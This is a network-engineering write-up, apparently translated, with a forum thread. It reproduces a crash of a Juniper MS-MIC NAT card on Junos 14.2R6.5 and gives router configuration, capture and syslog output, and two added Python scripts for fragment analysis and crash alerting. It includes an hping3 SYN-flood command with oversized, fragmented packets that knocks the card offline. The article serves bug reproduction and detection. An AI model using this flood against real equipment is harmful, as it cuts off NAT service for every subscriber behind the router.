This article shows an example of generated traffic that crashes an MS-MIC service card when it is passed through the card.
A description of the MS-MIC cards and what they do: see "Description of multiservice cards" (Описание мультисервисных карт).
Setup:
Model: mx80-48t
Junos: 14.2R6.5
MS-MIC-16G
CPE: Windows 10
NetScanTools (for traffic generation)
CPE: CentOS
hping version 3.0.0-alpha-1 (for traffic generation)
The problem did not reproduce when tested on 15.1R4.6.
Pool, rule and service-set configuration for NAT translation:
set services service-set NAT-SERVICE-SET nat-rules NAT-RULE
set services service-set NAT-SERVICE-SET next-hop-service inside-service-interface ms-0/2/0.100
set services service-set NAT-SERVICE-SET next-hop-service outside-service-interface ms-0/2/0.200
set services nat pool NAT-POOL-1 address 109.108.88.152/32
set services nat pool NAT-POOL-1 address 109.108.88.155/32
set services nat pool NAT-POOL-1 port automatic random-allocation
set services nat pool NAT-POOL-1 address-allocation round-robin
set services nat pool NAT-POOL-1 mapping-timeout 120
set services nat pool NAT-POOL-1 snmp-trap-thresholds address-port low 50
set services nat pool NAT-POOL-1 snmp-trap-thresholds address-port high 90
set services nat rule NAT-RULE match-direction input
set services nat rule NAT-RULE term t1 from source-prefix-list NAT-PREFIX-LIST
set services nat rule NAT-RULE term t1 then translated source-pool NAT-POOL-1
set services nat rule NAT-RULE term t1 then translated translation-type napt-44
set services nat rule NAT-RULE term t1 then translated address-pooling paired
Service interface configuration:
set interfaces ms-0/2/0 traceoptions
set interfaces ms-0/2/0 mtu 1518
set interfaces ms-0/2/0 services-options open-timeout 10
set interfaces ms-0/2/0 services-options close-timeout 20
set interfaces ms-0/2/0 services-options inactivity-tcp-timeout 25
set interfaces ms-0/2/0 services-options fragment-limit 10
set interfaces ms-0/2/0 services-options session-limit maximum 250k
set interfaces ms-0/2/0 services-options session-limit rate 100k
set interfaces ms-0/2/0 unit 100 family inet filter input NAT-VALID
set interfaces ms-0/2/0 unit 100 family inet filter output NAT-VALID
set interfaces ms-0/2/0 unit 100 service-domain inside
set interfaces ms-0/2/0 unit 200 family inet
set interfaces ms-0/2/0 unit 200 service-domain outside
Routing-instance (RI) configuration for steering traffic through the service card:
set routing-instances NAT-RI instance-type virtual-router
set routing-instances NAT-RI interface ms-0/2/0.100
set routing-instances NAT-RI routing-options static route 0.0.0.0/0 next-hop ms-0/2/0.100
set routing-instances NAT-RI routing-options static route 192.168.101.0/24 next-table inet.0
Tests:
Normal test traffic generation: hping3 -d 1400 -S --destport 8081 -w 12000 --flood 77.66.55.4 from two hosts. With a 1400-byte payload each SYN fits into a single 1440-byte IP packet, so nothing is fragmented; web pages on the CPE still open while this runs, and the card sits at about 80k sessions and 6% CPU:
root@gw1.tvnet.if.ua> show services sessions count
Interface        Service set          Sessions count
ms-0/2/0         NAT-SERVICE-SET      80118
root@gw1.tvnet.if.ua> show services service-sets summary
                 Service sets                                               CPU
Interface        configured   Bytes used             Policy bytes used     utilization
ms-0/2/0         2            1509678767 (13.07%)    3028768 ( 0.28%)      5.91 %
Attempt 1 to crash the MS-MIC (changing the packet size):
hping3 -d 2500 -S --destport 8081 -w 12000 --flood 77.66.55.4
With a 2500-byte payload every SYN exceeds the 1500-byte Ethernet MTU, so the sending host emits each one as two IP fragments: a 1500-byte first fragment (flags [+], i.e. more fragments follow) and a 1060-byte second fragment at offset 1480. Two things stand out in the capture below. The second fragment carries no TCP header, so tcpdump prints it without ports and a stateless filter cannot match it on port either. And every fragment carries the same IP id (82), so on the card all of them fall under a single reassembly key (source, destination, protocol, id) even though they belong to different SYNs from different source ports. Captured on eth4:
tcpdump -i eth4 -vvv -c 500
15:54:44.911423 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
192.168.101.5.signet-ctf > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 2134716389:2134717849, win 12000, length 1460
15:54:44.911438 IP (tos 0x0, ttl 64, id 82, offset 1480, flags [none], proto TCP (6), length 1060)
192.168.101.5 > lo0.dr2.gl.cph.ngdc.net: tcp
15:54:44.911465 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
192.168.101.5.ccs-software > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 613401041:613402501, win 12000, length 1460
15:54:44.911482 IP (tos 0x0, ttl 64, id 82, offset 1480, flags [none], proto TCP (6), length 1060)
192.168.101.5 > lo0.dr2.gl.cph.ngdc.net: tcp
15:54:44.911578 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
192.168.101.5.srp-feedback > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 2132395273:2132396733, win 12000, length 1460
15:54:44.911594 IP (tos 0x0, ttl 64, id 82, offset 1480, flags [none], proto TCP (6), length 1060)
192.168.101.5 > lo0.dr2.gl.cph.ngdc.net: tcp
15:54:44.911612 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
192.168.101.5.ndl-tcp-ois-gw > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 1099711870:1099713330, win 12000, length 1460
15:54:44.911628 IP (tos 0x0, ttl 64, id 82, offset 1480, flags [none], proto TCP (6), length 1060)
192.168.101.5 > lo0.dr2.gl.cph.ngdc.net: tcp
15:54:44.911646 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
192.168.101.5.tn-timing > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 1527652475:1527653935, win 12000, length 1460
15:54:44.911662 IP (tos 0x0, ttl 64, id 82, offset 1480, flags [none], proto TCP (6), length 1060)
192.168.101.5 > lo0.dr2.gl.cph.ngdc.net: tcp
15:54:44.911680 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
192.168.101.5.alarm > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 20866699:20868159, win 12000, length 1460
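The capture above is easier to reason about in aggregate than line by line. The following added example (written for this page, not part of the author's test setup) parses the two-line records that tcpdump prints with -vvv, groups the fragments the way a reassembler does, by (source, destination, protocol, IP id), and reports every key that receives more than one first fragment. On the sample lines, copied from the capture above, it finds a single key with id 82 holding four SYNs from four different source ports. It assumes a 20-byte IPv4 header with no options when converting the printed length into payload bytes.

```python
"""Group tcpdump -vvv fragment records by IP reassembly key and flag IP-id reuse.
Added example for this page, not the author's tooling. Assumes a 20-byte IPv4
header (no options) when turning the printed 'length' into payload bytes."""
import re
from collections import defaultdict

# Four first fragments and three trailing fragments, copied from the capture above.
SAMPLE = """\
15:54:44.911423 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
    192.168.101.5.signet-ctf > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 2134716389:2134717849, win 12000, length 1460
15:54:44.911438 IP (tos 0x0, ttl 64, id 82, offset 1480, flags [none], proto TCP (6), length 1060)
    192.168.101.5 > lo0.dr2.gl.cph.ngdc.net: tcp
15:54:44.911465 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
    192.168.101.5.ccs-software > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 613401041:613402501, win 12000, length 1460
15:54:44.911482 IP (tos 0x0, ttl 64, id 82, offset 1480, flags [none], proto TCP (6), length 1060)
    192.168.101.5 > lo0.dr2.gl.cph.ngdc.net: tcp
15:54:44.911578 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
    192.168.101.5.srp-feedback > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 2132395273:2132396733, win 12000, length 1460
15:54:44.911594 IP (tos 0x0, ttl 64, id 82, offset 1480, flags [none], proto TCP (6), length 1060)
    192.168.101.5 > lo0.dr2.gl.cph.ngdc.net: tcp
15:54:44.911680 IP (tos 0x0, ttl 64, id 82, offset 0, flags [+], proto TCP (6), length 1500)
    192.168.101.5.alarm > lo0.dr2.gl.cph.ngdc.net.tproxy: Flags [S], seq 20866699:20868159, win 12000, length 1460
"""

IPV4_HDR_LEN = 20  # assumption: no IP options in any fragment

HEADER = re.compile(
    r"^(?P<ts>\S+) IP \(tos \S+, ttl \d+, id (?P<id>\d+), offset (?P<off>\d+), "
    r"flags \[(?P<flags>[^\]]*)\], proto (?P<proto>\w+) \(\d+\), length (?P<len>\d+)\)"
)
ADDRS = re.compile(r"^\s*(?P<src>\S+) > (?P<dst>[^:\s]+):")


def _split_port(endpoint, has_port):
    """tcpdump appends '.port' to the host only on the first fragment (offset 0)."""
    if not has_port:
        return endpoint, None
    host, port = endpoint.rsplit(".", 1)
    return host, port


def parse_fragments(text):
    """Yield one dict per IPv4 fragment from the two-line tcpdump -vvv records."""
    pending = None
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            pending = m.groupdict()
            continue
        a = ADDRS.match(line)
        if pending and a:
            first = pending["off"] == "0"
            src, sport = _split_port(a["src"], first)
            dst, dport = _split_port(a["dst"], first)
            yield {
                "ts": pending["ts"], "src": src, "dst": dst, "sport": sport, "dport": dport,
                "proto": pending["proto"], "id": int(pending["id"]),
                "offset": int(pending["off"]),       # byte offset, as tcpdump prints it
                "more": "+" in pending["flags"],     # '+' is tcpdump's rendering of MF
                "payload": int(pending["len"]) - IPV4_HDR_LEN,
            }
            pending = None


def reassembly_keys(frags):
    """Bucket fragments by (src, dst, proto, id), the tuple a reassembler keys on."""
    buckets = defaultdict(list)
    for f in frags:
        buckets[(f["src"], f["dst"], f["proto"], f["id"])].append(f)
    return buckets


def datagram_length(bucket):
    """Furthest payload byte seen under one key (the full size once the MF=0 fragment is in)."""
    return max(f["offset"] + f["payload"] for f in bucket)


def find_id_reuse(buckets, min_firsts=2):
    """Keys that received several first fragments: the sender reused the IP id while
    earlier datagrams under the same key may still have been awaiting reassembly."""
    hits = {}
    for key, bucket in buckets.items():
        firsts = [f for f in bucket if f["offset"] == 0]
        if len(firsts) >= min_firsts:
            hits[key] = {
                "first_fragments": len(firsts),
                "trailing_fragments": len(bucket) - len(firsts),
                "distinct_source_ports": len({f["sport"] for f in firsts}),
                "datagram_length": datagram_length(bucket),
            }
    return hits


def analyze(text=SAMPLE):
    return find_id_reuse(reassembly_keys(parse_fragments(text)))


if __name__ == "__main__":
    for key, stats in analyze().items():
        print(key, stats)
```

Run it against a full `tcpdump -vvv` file to see how many first fragments land under one key within a short window. The datagram_length of 2520 bytes it reports is hping3's 2500-byte payload plus the 20-byte TCP header, which confirms the two fragments are the halves of one SYN.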
During the flood the PIC's kernel reports that the services application exited on signal 6 (SIGABRT), the Routing Engine drops its connection to the PIC, and both logical units of ms-0/2/0 go down:
Jun 30 17:21:36 gw1.tvnet.if.ua (FPC Slot 0, PIC Slot 2) ms02 kernel: svcs_ms2_app_sigcore_exit: sending UKERN_ST_DOWN (pid=188, td=0xc00000000344f960, sig=6)
Jun 30 17:21:36 gw1.tvnet.if.ua /kernel: peer_input_pending_internal:[4506] VKS0 for peer type 22 indx 2 reported a sb_state 32 = SBS_CANTRCVMORE
Jun 30 17:21:36 gw1.tvnet.if.ua /kernel: peer_inputs:4766 VKS0 closing connection peer type 22 indx 2 err 5
Jun 30 17:21:36 gw1.tvnet.if.ua /kernel: pfe_listener_disconnect: conn dropped: listener idx=1, tnpaddr=0x80000310, reason: generic peer error
Jun 30 17:21:36 gw1.tvnet.if.ua datapath-traced[1759]: datapath_traced_connection_event_handler: Disconnected from MSPMAND
Jun 30 17:21:36 gw1.tvnet.if.ua mspd[1752]: Removed PIC connection state for fpc=0 pic=2 session=0x1890100
Jun 30 17:21:36 gw1.tvnet.if.ua (FPC Slot 0, PIC Slot 2) ms02 mspsmd[176]: mspsmd_connection_shutdown: Unexpected shutdown of connection, try reconnecting.
Jun 30 17:21:37 gw1.tvnet.if.ua /kernel: if_pfe_services_health_status: Generating Health status (down) msg for ifd : ms-0/2/0
Jun 30 17:21:37 gw1.tvnet.if.ua /kernel: if_pfe_services_health_status: Skipped health status (down) AMS member mams-0/2/0 as not marked lb-member yet
Jun 30 17:21:37 gw1.tvnet.if.ua mib2d[1708]: SNMP_TRAP_LINK_DOWN: ifIndex 610, ifAdminStatus up(1), ifOperStatus down(2), ifName ms-0/2/0.100
Jun 30 17:21:37 gw1.tvnet.if.ua mib2d[1708]: SNMP_TRAP_LINK_DOWN: ifIndex 628, ifAdminStatus up(1), ifOperStatus down(2), ifName ms-0/2/0.200
After the crash the MS-MIC is no longer Online; the chassis shows it in the Ready state:
root@gw1.tvnet.if.ua> show chassis fpc pic-status
Slot 0 Online
PIC 0 Online 4x 10GE XFP
PIC 2 Ready MS-MIC-16G
Slot 1 Online
PIC 0 Online 12x 1GE(LAN) RJ45
PIC 1 Online 12x 1GE(LAN) RJ45
PIC 2 Online 12x 1GE(LAN) RJ45
PIC 3 Online 12x 1GE(LAN) RJ45
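For the operations side, the crash leaves a recognisable trace in syslog: the PIC's kernel reports the services application exiting on a signal, mspd removes the PIC connection state, the kernel generates a health-down message for the ms- physical interface, and mib2d raises SNMP_TRAP_LINK_DOWN for its logical units. The following added example (not Juniper tooling and not the author's code) turns that sequence into one alert per crashed PIC, using the ms-<fpc>/<pic>/<port> naming of Junos service interfaces to tie the health and link-down lines to the right slot. The sample lines are copied from the syslog excerpt above; the signal-name table is an assumption that only covers the two numbers that are the same on every Unix.

```python
"""Detect a service-PIC crash in Junos syslog and list the interfaces it took down.
Added example for this page, not Juniper tooling. Ties link-down traps to the crashed
PIC through the ms-<fpc>/<pic>/<port> interface naming."""
import re

# Copied from the syslog excerpt above (a subset of the lines).
SAMPLE_LOG = """\
Jun 30 17:21:36 gw1.tvnet.if.ua (FPC Slot 0, PIC Slot 2) ms02 kernel: svcs_ms2_app_sigcore_exit: sending UKERN_ST_DOWN (pid=188, td=0xc00000000344f960, sig=6)
Jun 30 17:21:36 gw1.tvnet.if.ua /kernel: pfe_listener_disconnect: conn dropped: listener idx=1, tnpaddr=0x80000310, reason: generic peer error
Jun 30 17:21:36 gw1.tvnet.if.ua mspd[1752]: Removed PIC connection state for fpc=0 pic=2 session=0x1890100
Jun 30 17:21:37 gw1.tvnet.if.ua /kernel: if_pfe_services_health_status: Generating Health status (down) msg for ifd : ms-0/2/0
Jun 30 17:21:37 gw1.tvnet.if.ua mib2d[1708]: SNMP_TRAP_LINK_DOWN: ifIndex 610, ifAdminStatus up(1), ifOperStatus down(2), ifName ms-0/2/0.100
Jun 30 17:21:37 gw1.tvnet.if.ua mib2d[1708]: SNMP_TRAP_LINK_DOWN: ifIndex 628, ifAdminStatus up(1), ifOperStatus down(2), ifName ms-0/2/0.200
"""

# Assumption: only the two signal numbers that are identical on every Unix are named here.
SIGNAL_NAMES = {6: "SIGABRT", 11: "SIGSEGV"}

CRASH = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"\(FPC Slot (?P<fpc>\d+), PIC Slot (?P<pic>\d+)\) \S+ kernel: \S*sigcore_exit: .*\bsig=(?P<sig>\d+)"
)
HEALTH = re.compile(
    r"if_pfe_services_health_status: Generating Health status \((?P<state>\w+)\) msg for ifd : (?P<ifd>\S+)"
)
LINK_DOWN = re.compile(r"SNMP_TRAP_LINK_DOWN: .*\bifName (?P<ifl>\S+)")


def detect_service_pic_crash(text):
    """Return one event per crashed service PIC found in `text`, in log order."""
    events = {}
    for line in text.splitlines():
        c = CRASH.match(line)
        if c:
            fpc, pic, sig = int(c["fpc"]), int(c["pic"]), int(c["sig"])
            events[(fpc, pic)] = {
                "timestamp": c["ts"], "host": c["host"], "fpc": fpc, "pic": pic,
                "signal": sig, "signal_name": SIGNAL_NAMES.get(sig, f"signal {sig}"),
                "ifd_down": [],   # physical service interface(s) reported unhealthy
                "ifl_down": [],   # logical units that raised SNMP_TRAP_LINK_DOWN
            }
            continue
        h = HEALTH.search(line)
        l = LINK_DOWN.search(line)
        for (fpc, pic), ev in events.items():
            prefix = f"ms-{fpc}/{pic}/"  # Junos names service interfaces ms-<fpc>/<pic>/<port>
            if h and h["state"] == "down" and h["ifd"].startswith(prefix):
                ev["ifd_down"].append(h["ifd"])
            if l and l["ifl"].startswith(prefix):
                ev["ifl_down"].append(l["ifl"])
    return list(events.values())


def summarize(event):
    """One-line alert text for a SIEM or pager."""
    down = ", ".join(event["ifd_down"] + event["ifl_down"]) or "none"
    return (f"{event['timestamp']} {event['host']}: services app on FPC {event['fpc']} "
            f"PIC {event['pic']} exited on {event['signal_name']}; down: {down}")


if __name__ == "__main__":
    for ev in detect_service_pic_crash(SAMPLE_LOG):
        print(summarize(ev))
```

Because the NAT-RI default route points at ms-0/2/0.100, a link-down on that unit means every subscriber behind the routing instance loses NAT at once, so this event deserves a higher severity than an ordinary link flap.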
Could you show the firewall filter referenced as NAT-VALID?
show firewall filter NAT-VALID
term t10 {
from {
source-address {
192.168.101.0/24;
}
}
then {
routing-instance NAT-RI;
}
}
term t20 {
then accept;
}
Like this?
No. It just says: from the NAT subnet, then accept. Everything else is discarded.
If it's not too much trouble, could you post the NAT-related part of the config? I'd like to understand how the card works with a routing instance; we only managed to get NAT running through:
service-set ss2 {
nat-rules r1;
interface-service {
service-interface ms-0/2/0;
}
}
and could not get it working through next-hop at all.
My ms-0/2/0 card drops out if even one link carrying NAT traffic goes down. For example:
Nov 8 14:30:55 Core1 mib2d[1598]: SNMP_TRAP_LINK_DOWN: ifIndex 515, ifAdminStatus up(1), ifOperStatus down(2), ifName xe-0/0/3
Nov 8 14:31:06 Core1 tfeb0 Transient flow-control asserted by MAC on ms-0/2 for 1 seconds
Nov 8 14:31:07 Core1 tfeb0 Transient flow-control asserted by MAC on ms-0/2 for 2 seconds
Nov 8 14:31:08 Core1 tfeb0 Prolonged flow-control asserted by MAC on ms-0/2
service-set test_shaper {
nat-rules test_shaper;
next-hop-service {
inside-service-interface ms-0/2/0.70;
outside-service-interface ms-0/2/0.71;
}
}
routing-instances {
test_shaper {
instance-type virtual-router;
interface xe-0/0/3.3903;
interface ms-0/2/0.70;
routing-options {
static {
route 192.168.191.0/24 next-hop 10.100.100.2;
route 0.0.0.0/0 next-hop ms-0/2/0.70;
}
}
}
}
Alexander, have you run into any problems with this NAT card in terms of disconnects of Skype, SSH and other connections going through NAT? And did you configure applications, or is everything at the defaults?
The problem was with version 13.3R9; after upgrading to 15.1R4 there are no problems with NAT.
And how do you steer traffic into NAT-RI? Do you put a filter on the interface?
In different ways. You can use a filter on the subscriber, a filter on the uplink interface, or a global filter under forwarding-options. In this example the filter was most likely attached to the subscriber interface.
For some reason NAT-SERVICE-SET won't attach to the interface:
family inet {
service {
input {
##
## Warning: this service set must be an interface service
##
service-set NAT-SERVICE-SET;
}
output {
service-set NAT-SERVICE-SET;
}
}
address 10.10.10.1/24;
'NAT-SERVICE-SET'
this service set must be an interface service
error: configuration check-out failed: (statements constraint check failed)